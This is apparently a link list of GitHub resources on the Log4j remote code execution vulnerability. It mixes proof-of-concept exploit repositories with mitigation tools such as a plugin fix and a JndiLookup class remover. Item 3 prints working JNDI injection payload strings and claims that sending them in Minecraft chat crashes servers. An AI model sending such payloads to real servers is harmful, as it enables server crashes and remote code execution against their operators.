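1. Apache Log4j remote code execution
An attacker can directly craft a malicious request to trigger the remote code execution vulnerability. Exploitation requires no special configuration; as verified by the Alibaba Cloud security team, Apache Struts2, Apache Solr, Apache Druid, Apache Flink and others are all affected.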
https://github.com/tangxiaofeng7/apache-log4j-poc
2. Log4j-rce
https://github.com/Al0sc/Log4j-rce
3. Log4J-RCE-Implementation
Basically, run this (replace the server's IP and port in this repo): ${jndi:ldap://127.0.0.1:3710/a}
Currently, this can crash any MC server or proxy.
Sending the chat message "${jndi:ldap://192.168.1.123:3710/owo}" on any 1.8.9 server will crash it.
https://github.com/Marcelektro/Log4J-RCE-Implementation
https://github.com/pimps/CVE-2017-5645
4. Log4J Fixer
Works for servers and Bungeecord
Fixes the vulnerability in Log4J that allows remote code execution, IP logging and server crashes
Requires: ProtocolLib ( https://www.spigotmc.org/resources/protocollib.1997/ )
https://github.com/notrhys/Log-4J-Exploit-Fix
5. NukeJndiLookupFromLog4j
Removal of JndiLookup in now obsolete Minecraft versions, or versions that still have log4j < 2.10 and are unable to use -Dlog4j2.formatMsgNoLookups=true. This is needed because of a major vulnerability introduced by the class' functionality, see more here: https://github.com/apache/logging-log4j2/pull/608
Java Application: resides in this repository (see releases) and removes JndiLookup.class from any log4j builds you feed it via a GUI. Hard removal of the class on the server side forcibly closes the vulnerability.
LoliASM: A Minecraft mod that does numerous major Minecraft optimizations and bugfixes. As of 5.0, it will have a softer fix available.
https://github.com/LoliKingdom/NukeJndiLookupFromLog4j